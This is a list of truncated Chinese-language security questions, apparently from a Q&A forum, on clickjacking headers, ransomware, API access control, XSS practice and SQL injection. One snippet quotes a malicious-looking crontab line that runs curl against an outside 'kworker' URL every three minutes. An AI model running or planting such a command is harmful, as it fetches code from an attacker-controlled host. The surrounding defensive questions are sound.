我最近看到了一些恶意域，包括我的网站页面。 我最初怀疑包含 iframe，但我已经在我的 httpd.conf 中进行了配置。Header always set X-Frame-Options SA...

我所在的整个大学网络都被黑客入侵，几台计算机受到影响。在这些计算机上，文件是加密的。 但是，大多数受影响的计算机都运行Windows，而我运行的是Arch Linux。 有没有办法检查我的电脑是否受...

我目前开发了一个后端应用程序，它具有一些重要的功能。我想从前端使用后端终结点，但我想确保只有前端终结点调用后端终结点，而不调用其他终结点。目前，任何访问我的网络应用程序的人都可以利用这些功能（我不需要...

我已经开始使用 XSS 来更好地改善我在工作中的安全状况。我已经能够使用重定向的 POST 表单成功利用反射的 XSS 攻击，但我似乎无法删除页面上显示的无关字符。 我已经检查过： XSS：DOM...

考虑一个简单的资源，如 Web 应用程序的产品。如果有人掌握了访问令牌和资源 ID，则可以轻松删除资源。我们如何保护此类攻击。...

OWASP 建议在 API 响应中使用，以避免拖放式点击劫持攻击。Content-Security-Policy: frame-ancestors 'none' 但是，CSP 规范似乎表明，加载 H...

我发现在公司服务器中有一个使用以下代码运行的 crontab： */3 * * * * curl -sk "http://repo1.criticalnumeric.tech/kworker?tim...

我正在构建一个应用程序，我需要在客户端前端应用程序中向外部 API 发出请求，我有点不知所措，不知道如何使其最大安全，以便只有有效的请求才能转发到这个外部 API，而不是任何人想要的。 作为安全性的...

黑客访问了我的数据库用户列表和其他表。 首先，我在所有事务中使用参数化命令 command.Parameters.Add("@Parameter1", SqlDbType.NVarChar).Va...